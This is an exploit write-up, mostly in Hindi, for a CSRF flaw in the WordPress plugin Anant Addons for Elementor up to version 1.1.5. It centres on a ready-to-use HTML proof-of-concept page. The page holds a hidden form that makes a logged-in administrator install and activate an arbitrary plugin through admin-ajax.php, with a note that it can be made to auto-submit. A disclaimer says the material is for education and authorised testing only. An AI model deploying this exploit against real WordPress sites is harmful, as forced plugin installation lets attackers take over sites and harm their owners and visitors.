
Anant Addons for Elementor <= 1.1.5 CSRF द्वारा Arbitrary Plugin Installation भेद्यता
क्रॉस-साइट रिक्वेस्ट फ़ोर्जरी (CSRF) भेद्यता anantaddons के Anant Addons for Elementor में
यह समस्या संस्करणों को प्रभावित करती है: अज्ञात से 1.1.5 तक
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:Hयह भेद्यता अप्रमाणित हमलावरों को लॉग-इन एडमिनिस्ट्रेटर की जानकारी के बिना उनकी ओर से मनमाना प्लगइन इंस्टॉलेशन करने की अनुमति देती है।
एक दुर्भावनापूर्ण पृष्ठ या फ़ॉर्म बनाकर, हमलावर चुपचाप एडमिन को वर्डप्रेस रिपॉजिटरी से किसी भी प्लगइन को इंस्टॉल और सक्रिय करने के लिए मजबूर कर सकता है।
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Anant Addons for Elementor <= 1.1.5 CSRF Exploit</title>
<style>
body {
background-color: #111;
color: #0f0;
font-family: monospace;
padding: 40px;
}
h1 {
color: #ff0055;
font-size: 24px;
border-bottom: 1px solid #555;
padding-bottom: 10px;
}
.box {
background-color: #222;
border: 1px solid #444;
padding: 20px;
margin-top: 20px;
}
input[type="submit"] {
background-color: #ff0055;
color: #fff;
border: none;
padding: 10px 20px;
font-weight: bold;
cursor: pointer;
}
input[type="submit"]:hover {
background-color: #cc0044;
}
</style>
</head>
<body>
<h1>
Anant Addons for Elementor <= 1.1.5<br>
CSRF to Arbitrary Plugin Installation Vulnerability
</h1>
<div class="box">
<p># By: <strong>Nxploited | Khaled Alenazi</strong></p>
<p># Type: <strong>CSRF (No Nonce Validation)</strong></p>
<p># Impact: <strong>Unauthenticated attacker can force admin to install and activate arbitrary WordPress plugins</strong></p>
</div>
<form action="http://192.168.100.74:888/wordpress/wp-admin/admin-ajax.php?action=install_act_plugin" method="POST" class="box">
<input type="hidden" name="plugs" value="hello-dolly">
<p>🎯 Click the button below to trigger plugin installation (admin session must be active):</p>
<input type="submit" value="Exploit Now">
</form>
</body>
</html>
🎯 जब कोई लॉग-इन एडमिनिस्ट्रेटर इस फ़ॉर्म पर क्लिक करता है (या यह किसी दुर्भावनापूर्ण पृष्ठ पर ऑटो-सबमिट होता है), तो प्लगइन चुपचाप इंस्टॉल और सक्रिय हो जाएगा।
यह रिपॉजिटरी और सामग्री केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है।
लेखक इस जानकारी के अनुचित उपयोग से होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
हमेशा उन सिस्टम्स पर परीक्षण करें जो आपके स्वामित्व में हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है।
द्वारा: Nxploited | Khaled ALenazi